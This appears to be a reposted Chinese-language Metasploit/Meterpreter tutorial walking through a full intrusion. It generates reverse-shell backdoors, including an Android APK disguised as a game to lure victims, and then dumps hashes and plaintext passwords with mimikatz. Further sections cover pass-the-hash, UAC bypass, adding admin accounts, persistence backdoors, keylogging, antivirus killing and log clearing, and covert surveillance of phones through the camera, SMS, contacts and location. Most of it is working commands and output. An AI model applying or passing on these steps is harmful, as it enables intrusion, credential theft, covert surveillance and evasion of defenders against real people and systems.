0x1 反弹脚本的使用

0x1.1 使用msfvenom生成反弹文件

用msfvenom生成一个反弹木马文件,发给目标,等待点击触发反弹

生成Windows后门

msf> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=6666 -f exe -o /root/桌面/tcp.exe

生成PHP后门

msf> msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=6666 -f raw > php.php

生成ASPX后门

msf> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=6666 R | msfencode -e x86/shikata_ga_nai -a x86 -t aspx -o door.aspx

生成APK后门

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=6666 -f apk -o /root/Desktop/TempleRun2.apk

0x1.2 msf监听

利用msf的handler模块进行监听,获得反弹shell

1
2
3
4
5
6
7
8
9
msf> use exploit/multi/handler

msf exploit(handler)> info                          # 可以查看该模块的信息
msf exploit(handler)> show options                  # 可以看到没有任何选项,因此还需要设置一个攻击的载荷payload

msf exploit(handler)> set payload windows/meterpreter/reverse_tcp 
msf exploit(handler)> set lhost 192.168.85.156
msf exploit(handler)> set lport 6666                # Kali监听本机的6666端口
msf exploit(handler)> exploit

0x1.3 获得反弹会话

查看所有会话

meterpreter> sessions -i

与会话1进行交互(interrection)

meterpreter> sessions -i 1

0x2 基本命令

meterpreter 下,如果不特殊说明(比如添加 l 字母:lcdgetlwd),使用的命令默认是用来操作被控肉鸡的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
meterpreter> getlwd                                 #获取自己当前系统的目录,等同于lpwd命令,Print local working directory
meterpreter> getwd                                  #获取被控肉鸡的工作目录,等同于pwd命令,Print working directory
meterpreter> pwd                                    #肉鸡上的当前工作目录
meterpreter> search							        #搜索文件,使用 search -h 查看帮助
meterpreter> ls                                     #输入肉鸡上的当前目录列表,等同于dir
meterpreter> lls									#显示自己当前系统的所有文件和文件夹
meterpreter> dir 
meterpreter> rm c:\\111.txt                         #删除肉鸡上的111.txt文件
meterpreter> download c:\\1111.txt /root            #下载肉鸡上的1111.txt文件到当前kali机器
meterpreter> upload /root/desktop/test.txt c:/      #将kali上的test.txt文件上传到目标肉鸡的c盘
meterpreter> edit c:\\xxx.txt                       #用vim编辑肉鸡上的xxx.txt文件
meterpreter> cat c:\\111.txt                        #显示肉鸡上的111.txt文件
meterpreter> cd										#切换路径
meterpreter> lcd									#切换自己当前系统的目录。
meterpreter> getuid                                 #查看被控肉鸡的权限,等同于whoami
meterpreter> mkdir									#创建文件夹
meterpreter> rmdir									#删除文件夹
meterpreter > getpid                                #查看在被控肉鸡上的当前进程号,即:反弹脚本的进程pid
meterpreter > ps                                    #查看运行的进程
meterpreter > kill 123                              #杀死pid为123的进程,配合ps命令使用

0x3 端口转发连接3389

0x3.1 进行端口转发

1
2
3
4
5
6
7
8
9
10
11
12
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
1
2
meterpreter > portfwd add -l 8888 -r 192.168.85.135 -p 3389 -u admin -p admin888        # 远程内网肉鸡的ip为192.168.85.135,并设置用户名以及密码直接登录
<li> Local TCP relay created: :8888 <-> 192.168.85.135:3389

0x3.2 连接内网3389

1
root@mykali:~/桌面# rdesktop -a 32 127.0.0.1:8888                # 在弹出的窗口中输入用户名密码进行连接,其中-f表示全屏,-a表示颜色深度

0x3.3 删除端口转发

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.


meterpreter > portfwd list

Active Port Forwards
====================

   Index  Local         Remote               Direction
   -----  -----         ------               ---------
   1      0.0.0.0:8888  192.168.85.135:3389  Forward

1 total active port forwards.

meterpreter > portfwd delete -l 8888
<li> Successfully stopped TCP relay on 0.0.0.0:8888

meterpreter > portfwd list

No port forwards are currently active.

如果连接远程桌面时提示:要登录到这台远程计算机,你必须授予允许通过终端服务登录的权限,默认地,“远程桌面用户组的成员拥有该权限,如果你不是远程桌面用户组或其他拥有该权限的成员,或者如果”远程桌面用户”组没有该权限,你必须被手动授予该权限。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
C:\Users\test>net localgroup

\\ADMIN-PC 的别名

--------------------------------------------------
*Administrators
*Backup Operators
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Replicator
*Users
命令成功完成。

使用cmd命令将目标肉鸡远程登录的用户添加到“Remote Desktop Users”组,这样就可以通过终端进行远程桌面连接admin用户了。

1
C:\Users\test>net localgroup "Remote Desktop Users" admin /add        # 将用户admin添加到远程桌面用户组

类似地,如果要将用户admin提升为超管用户权限,则:

1
C:\Users\test>net localgroup Administrators admin /add        # 将用户admin添加到Administrators组

0x4 抓取密码

0x4.1 抓取hash

在meterpreter会话中,直接使用hashdump命令导出来
[x] 如果权限不够,hashdump无法导出密文,则需要先将用户权限提升为system权限

1
2
3
meterpreter > hashdump 
admin:1003:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

0x4.2 抓取明文

首先需要获得一个meterpreter会话,然后加载mimikatz插件,查看明文

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
// 查看明文

meterpreter > load mimikatz 
Loading extension mimikatz...Success.

meterpreter > help                                                      # 显示帮助信息,包括插件的
...
Mimikatz Commands                                                       # mimikatz命令
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds                # 将hash值变成明文:先执行msv命令,然后再执行kerberos命令
    livessp           Attempt to retrieve livessp creds
    mimikatz_command  Run a custom command                              # 执行自定义命令:比如mimikatz_command -f sekurlsa::searchPasswords可导出系统用户的明文密码
    msv               Attempt to retrieve msv creds (hashes)            # 获取hash值(密文)
    ssp               Attempt to retrieve ssp creds
    tspkg             Attempt to retrieve tspkg creds
    wdigest           Attempt to retrieve wdigest creds


meterpreter > mimikatz_command -h
Usage: mimikatz_command -f func -a args

Executes a mimikatz command on the remote machine.
e.g. mimikatz_command -f sekurlsa::wdigest -a "full"

OPTIONS:

    -a <opt>  The arguments to pass to the command.
    -f <opt>  The function to pass to the command.
    -h        Help menu.

meterpreter > mimikatz_command -f sekurlsa::wdigest -a "full"

0x4.3 直接使用hash登录远程系统

如果通过手段获得了hash,但又得不到明文密码,我们依然可以直接使用hash值直接登录系统

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
msf > use exploit/windows/smb/psexec

msf exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                                  yes       The target address
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(windows/smb/psexec) > set rhost 192.168.85.135
rhost => 192.168.85.135

msf exploit(windows/smb/psexec) > set smbuser admin
smbuser => admin

msf exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634
smbpass => aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634

msf exploit(windows/smb/psexec) > exploit 

<li> Started reverse TCP handler on 192.168.85.159:4444 
<li> 192.168.85.135:445 - Connecting to the server...
<li> 192.168.85.135:445 - Authenticating to 192.168.85.135:445 as user 'admin'...
...
meterpreter >

获取System权限失败解决办法

提权不成功是因为有本地安全策略(UAC:user account control,用户账户控制),我们需要绕过这个安全策略就可以提权了。

常用的模块:

绕过:
bypassuac提权
exploit/windows/local/bypassuac_comhijack
windows/local/bypassuac_injection

备注:

除了使用UAC绕过,也可以尝试使用meterpreter命令中的migrate命令注入某个具有system权限的进程,从而获得system权限

0x5.1 getsystem提权失败案列

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
meterpreter > getuid                                                            # 查看权限(whoami),发现是普通用户权限
Server username: ADMIN-PC\zhangsan

meterpreter > getsystem -h                                                      # 查看提权命令getsystem的帮助信息
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
        0 : All techniques available
        1 : Named Pipe Impersonation (In Memory/Admin)
        2 : Named Pipe Impersonation (Dropper/Admin)
        3 : Token Duplication (In Memory/Admin)

meterpreter > getsystem                                                         # 提权:失败
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

meterpreter > getsystem -t 1                                                    # 提权:失败
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)

meterpreter > getsystem -t 2                                                    # 提权:失败
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (Dropper/Admin)

meterpreter > getsystem -t 3                                                    # 提权:失败
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Token Duplication (In Memory/Admin)

0x5.2 通过bypassuac绕过提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
meterpreter > getsystem -t 3                                                    # 提权:失败
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Token Duplication (In Memory/Admin)

meterpreter > background                                                        # 将meterpreter转入后台
<li> Backgrounding session 2...



msf exploit(multi/handler) > search bypassuac                                   # 搜索bypassuac相关的模块

Matching Modules
================

   Name                                              Disclosure Date  Rank       Description
   ----                                              ---------------  ----       -----------
   exploit/windows/local/bypassuac                   2010-12-31       excellent  Windows Escalate UAC Protection Bypass
   exploit/windows/local/bypassuac_comhijack         1900-01-01       excellent  Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   exploit/windows/local/bypassuac_eventvwr          2016-08-15       excellent  Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   exploit/windows/local/bypassuac_fodhelper         2017-05-12       excellent  Windows UAC Protection Bypass (Via FodHelper Registry Key)
   exploit/windows/local/bypassuac_injection         2010-12-31       excellent  Windows Escalate UAC Protection Bypass (In Memory Injection)
   exploit/windows/local/bypassuac_injection_winsxs  2017-04-06       excellent  Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   exploit/windows/local/bypassuac_vbs               2015-08-22       excellent  Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

msf exploit(multi/handler) > use exploit/windows/local/bypassuac_comhijack      # 使用模块

msf exploit(windows/local/bypassuac_comhijack) > show options                   # 查看模块选项,发现需要设置一个session的id,操作系统target会自动选择(可以通过show targets查看)

Module options (exploit/windows/local/bypassuac_comhijack):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(windows/local/bypassuac_comhijack) > sessions -l                    # 查看当前的sessions列表

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  2         meterpreter x86/windows  ADMIN-PC\zhangsan @ ADMIN-PC  192.168.85.158:6666 -> 192.168.85.135:49594 (192.168.85.135)

msf exploit(windows/local/bypassuac_comhijack) > set session 2                  # 给bypassuac模块设置一个session
session => 2

msf exploit(windows/local/bypassuac_comhijack) > exploit 

[-] Handler failed to bind to 192.168.85.158:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
<li> UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
<li> Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
<li> Uploading payload to C:\Users\zhangsan\AppData\Local\Temp\CMresjGh.dll ...
<li> Executing high integrity process ...
<li> Sending stage (179779 bytes) to 192.168.85.135
<li> Meterpreter session 3 opened (192.168.85.158:4444 -> 192.168.85.135:49608) at 2018-03-24 21:46:54 +0800         # 发现开启了一个session
<li> Cleaining up registry ...
<li> Exploit completed, but no session was created.

msf exploit(windows/local/bypassuac_comhijack) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  2         meterpreter x86/windows  ADMIN-PC\zhangsan @ ADMIN-PC  192.168.85.158:6666 -> 192.168.85.135:49594 (192.168.85.135)
  3         meterpreter x86/windows  ADMIN-PC\zhangsan @ ADMIN-PC  192.168.85.158:4444 -> 192.168.85.135:49608 (192.168.85.135)

msf exploit(windows/local/bypassuac_comhijack) > sessions -i 3                  # 与id为3的会话进行交互
<li> Starting interaction with 3...

meterpreter > getuid                                                            # 查看权限
Server username: ADMIN-PC\zhangsan

meterpreter > getsystem                                                         # 提权
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid                                                            # 查看权限,发现成功提升为system权限了
Server username: NT AUTHORITY\SYSTEM

提升权限后,我们添加用户admin,然后添加到管理员组,开启远程桌面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
meterpreter > shell                                                         # 进入目标的shell命令
Process 4880 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>chcp 65001                                              # 修改终端的代码页为utf-8,即65001,避免乱码
chcp 65001
Active code page: 65001

C:\Windows\system32>net user                                                # 查看当前存在的用户
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    zhangsan                 
The command completed with one or more errors.


C:\Windows\system32>net user admin admin /add                               # 添加用户,用户名、密码均为admin
net user admin admin /add
The command completed successfully.

C:\Windows\system32>net localgroup administrators admin /add                # 将用户admin添加到超管administrators组
net localgroup administrators admin /add
The command completed successfully.

C:\Windows\system32>net user admin                                          # 查看用户admin的相关信息,发现属于administrators组
net user admin
User name                    admin
Full Name                    
Comment                      
User's comment               
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2018/3/24 22:29:56
Password expires             2018/5/5 22:29:56
Password changeable          2018/3/24 22:29:56
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users                   # 属于administrators组          
Global Group memberships     *None                 
The command completed successfully.


C:\Windows\system32>exit                                                    # 退出shell,返回到meterpreter界面
exit

meterpreter > background                                                     # 将meterpreter放入后台,准备进入msf使用rdesktop远程桌面
<li> Backgrounding session 7...

msf exploit(windows/local/bypassuac_injection) > sessions -l                # 查看当前会话列表

Active sessions
===============

  Id  Name  Type                     Information                     Connection
  --  ----  ----                     -----------                     ----------
  7         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ ADMIN-PC  192.168.85.158:4444 -> 192.168.85.135:49622 (192.168.85.135)

msf exploit(windows/local/bypassuac_injection) > sessions -i 7              # 与会话7进行交互
<li> Starting interaction with 7...

meterpreter > ifconfig                                                      # 查看IP


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:24:01:f8
MTU          : 1500
IPv4 Address : 192.168.85.135
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::75d8:f29b:5b86:a540
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > background                                                    # 将meterpreter放入后台,准备进入msf界面,使用linux命令rdesktop远程桌面
<li> Backgrounding session 7...

msf exploit(windows/local/bypassuac_injection) > rdesktop 192.168.85.135 -u admin -p admin      #使用rdesktop远程桌面连接,用户名、密码都为admin

....

0x6 加载插件

输入load (空格),然后按两次Tab,可以查可以加载的插件列表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
meterpreter > load                                                  # 按两次Tab查看所有列表
load espia       load incognito   load lanattacks  load powershell  load sniffer
load extapi      load kiwi        load mimikatz    load python      load winpmem

meterpreter > load mimikatz 
Loading extension mimikatz...Success.

meterpreter > help
...
Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds            # 将hash值变成明文:先执行msv命令,然后再执行kerberos命令
    livessp           Attempt to retrieve livessp creds
    mimikatz_command  Run a custom command                          # 执行自定义命令:比如mimikatz_command -f sekurlsa::searchPasswords可导出系统用户的明文密码
    msv               Attempt to retrieve msv creds (hashes)        # 获取hash值(密文)
    ssp               Attempt to retrieve ssp creds
    tspkg             Attempt to retrieve tspkg creds
    wdigest           Attempt to retrieve wdigest creds

meterpreter > mimikatz_command -h                                   # 输入mimi然后按Tab补全得到mimikatz_command
Usage: mimikatz_command -f func -a args

Executes a mimikatz command on the remote machine.
e.g. mimikatz_command -f sekurlsa::wdigest -a "full"

OPTIONS:

    -a <opt>  The arguments to pass to the command.
    -f <opt>  The function to pass to the command.
    -h        Help menu.

meterpreter > mimikatz_command -f sekurlsa::wdigest -a "full"
"0;315414","NTLM","zhangsan","ADMIN-PC","
zhangsan,ADMIN-PC,zhangsan888"
"0;315363","NTLM","zhangsan","ADMIN-PC","
zhangsan,ADMIN-PC,zhangsan888"
"0;997","Negotiate","LOCAL SERVICE","NT AUTHORITY","
,,"
"0;996","Negotiate","ADMIN-PC$","WORKGROUP","
ADMIN-PC$,WORKGROUP,"
"0;45513","NTLM","","",""
"0;999","NTLM","ADMIN-PC$","WORKGROUP","
ADMIN-PC$,WORKGROUP,"

0x7 控制安卓端手机

0x7.1 生成反弹后门

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 -f apk -o /root/Desktop/TempleRun2.apk

生成apk文件后,将生成的APK文件发送给目标手机,诱发受害者安装、点击。

0x7.2 监听和处理反弹

1
2
3
4
5
msf > use exploit/multi/handler
msf > set payload android/meterpreter/reverse_tcp
msf > set lhost 192.168.1.10
msf > set lport 6666
msf > exploit

当目标点击apk文件后,会得到反弹meterpreter

0x7.3 后渗透之安卓

可以通过help命令查看相关的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
meterpreter > sysinfo

    Computer    : localhost
    OS          : Android 4.4.4 - Linux 3.4.0-g26e4aff-00680-gaa7791b (armv7l)
    Meterpreter : java/android

meterpreter > check_root                            # 查看手机是否已经取得root权限
<li> Device is not rooted

meterpreter > dump_calllog                          # 下载目标手机上的通话记录
...
meterpreter > webcam_stream                         # 打开摄像头实时画面,会生成一个html文件,在浏览器打开资源管理器的路径可查看到,如:file:///root/xxx.html
...
meterpreter > wlan_geolocate                        #  查看手机目前所处的大概位置(将生成的URL复制到浏览器打开可看到定位)
...
meterpreter > send_sms -d 13698567890 -t 你好       # 发送短信
...
meterpreter > dump_sms                              # 导出短信列表
...
meterpreter > dump_contacts                         # 导出联系人列表
...

修改手机壁纸

1
2
3
4
5
6
7
8
9
meterpreter > background

msf > use post/multi/manage/set_wallpaper

msf post (set_wallpaper)>set WALLPAPER_FILE  /root/Desktop/hack.jpg

msf post (set_wallpaper)>set session 1

msf post (set_wallpaper)>exploit

0x8 权限维持(俗称维权)

Meterpreter的shell运行在内存中,目标重启就会失效,如果管理员给系统打上补丁,那么就没办法再次使用exploit获取权限,所以需要持久的后门对目标进行控制。

Msf提供了两种后门,一种是metsvc(通过服务启动),一种是persistence(支持多种方式启动)。

0x8.1 metsvc

使用run metsvc -h查看帮助,一共有三个参数。
-A:安装后门后,自动启动exploit/multi/handler模块连接后门
-h:查看帮助
-r:删除后门

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
meterpreter > run metsvc -A

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
<li> Creating a meterpreter service on port 31337
<li> Creating a temporary installation directory C:\Users\zhangsan\AppData\Local\Temp\CgfTLDlgpSXpA...
<li>  >> Uploading metsrv.x86.dll...
<li>  >> Uploading metsvc-server.exe...
<li>  >> Uploading metsvc.exe...
<li> Starting the service...
     * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

<li> Trying to connect to the Meterpreter service at 192.168.85.135:31337...
meterpreter > <li> Meterpreter session 6 opened (192.168.85.159:44823 -> 192.168.85.135:31337) at 2018-03-27 21:37:58 +0800

meterpreter >

当我们想要再次连接对方时,只需要设置对方的监听对口和对方的ip即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msf > use exploit/multi/handler 

msf exploit(multi/handler) > set payload windows/metsvc_bind_tcp 
payload => windows/metsvc_bind_tcp

msf exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     6666             yes       The listen port
   RHOST     192.168.85.135   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set lport 31337    #默认绑定31337端口
lport => 31337
msf exploit(multi/handler) > set rhost 192.168.85.135
rhost => 192.168.85.135
msf exploit(multi/handler) > exploit 
。。。

meterpreter >

0x8.2 Persistence

使用run persistence -h查看参数
-L:自启动脚本的路径,默认为%TEMP%
-P:需要使用的payload,默认为windows/meterpreter/reverse_tcp
-S:作为一个服务在系统启动时运行(需要SYSTEM权限)
-T:要使用的备用可执行模板
-U:用户登陆时运行
-X:系统启动时运行
-i:后门每隔多少秒尝试连接服务端
-p:服务端监听的端口
-r:服务端ip

生成后门

run persistence -U -i 10 -p 6666 -r 192.168.1.10

连接后门

1
2
3
4
5
msf> use exploit/multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp 
msf exploit(handler)> set lhost 192.168.85.156
msf exploit(handler)> set lport 6666                
msf exploit(handler)> exploit

0x9 内网渗透

获得内网的 meterpreter 之后:

可以通过 post/multi/manage/autoroute 模块查看子网、路由等信息

内网可能存在域管理,可以使用 use incognite 加载扩展,并使用相关命令来劫持域管理

内网渗透测试之域渗透详解

内网渗透信息收集综合实操报告

1x0 信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterperter> run post/windows/gather/checkvm            # 检测目标机是否为虚拟机(判断并不准确,模块代码仍需完善)
meterperter> run killav                                 # 杀死目标主机运行的杀毒软件,可能会误杀,比如会杀死cmd.
meterperter> run post/windows/gather/enum_applications  # 获取安装软件信
meterperter> run post/windows/gather/dumplinks          # 获取目标机器最近的文件操作
meterperter> run post/windows/gather/smart_hashdump     # 获取目标机系统用户Hash,当然也可以直接使用hashdump命令,但使用脚本更加隐蔽
meterperter> load mimikatz                              # 通过mimikatz获取明文密码
meterperter> help                                       # 查看帮助信息,包括mimikatz的命令             
meterperter> msv                                        # 通过mimikatz的msv命令导出msv凭证(hash密码),前提是当前进程为当前进程为system权限
meterperter> kerberos                                   # 通过mimikatz的kerberos命令导出明文密码

# mimikatz导出明文密码的其他方式

meterperter> meterpreter > mimikatz_command -f samdump::hashes          # 导出系统用户hash
meterperter> mimikatz_command -f sekurlsa::searchPasswords              # 导出系统用户的明文密码

1x1 开启远程桌面服务(3389)

1
2
3
4
meterpreter> shell
C:\Users\test>

C:\Users\test> wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

1x2 路由信息

1
2
3
4
5
meterpreter > run get_local_subnets                     # 获取目标主机的当前路由

meterpreter > run autoroute -s 192.168.3.0/24           # 添加路由

meterpreter > run autoroute -p

1x3 常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
meterpreter > background                                # 退出到msf命令提示符下

meterpreter > sessions                                  # 查看会话信息

meterpreter > lpwd                                      # 等价于在kali上输入pwd

meterpreter > lcd /etc                                  # 等价于在kali上输入cd /etc

meterpreter > run post/windows/gather/smart_hashdump    # 获取目标主机上用户的hash值

meterpreter > run post/windows/capture/keylog_recorder  # 键盘记录

meterpreter > run killav                                # 结束目标主机上的杀毒软件相关进程

meterpreter > clearev                                   # 清除系统日志

meterpreter > getuid                                    # 查看当前用户

meterpreter > getsystem                                 # 提权到system用户

meterpreter > getprivs                                  # 查看当前用户具有的权限

meterpreter > getpid                                    # 查看meterpreter注入到了什么进程中

meterpreter > migrate 1436                              # 更改到pid1436进程中

meterpreter > getpid                                    # 重新使用getpid命令查看

meterpreter > hashdump                                  # 获取目标主机上用户的hash值

meterpreter > sysinfo                                   # 查看目标系统的信息

meterpreter > kill 188                                  # 结束188进程

meterpreter > shell                                     # 获取目标操作系统的shell

meterpreter > idletime                                  # 查看目标主机已经空闲了多长时间

meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts           # 编辑hosts文件

meterpreter > record_mic -d 10 -f /root/桌面/1.mp4                      # 监听麦克风

meterpreter > load python                                               # 加载python插件

1x4 文件执行

1
2
3
4
5
6
7
8
meterpreter > dir windows\\system32\\nc.exe

meterpreter > execute -f nc -nvlp 3333                                              # 执行nc.exe
meterpreter > execute -f cmd.exe -i -H                                              # 获得目标主机的shell,-i交互模式,-H隐藏

meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"                # 选项-m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。

meterpreter > cat foo.txt

参考资料

Windows内核漏洞利用提权教程
小白入坑MSF

待补充…

本文收集于网络,如有侵犯请发邮件or评论联系我,我会在第一时间修改,删除。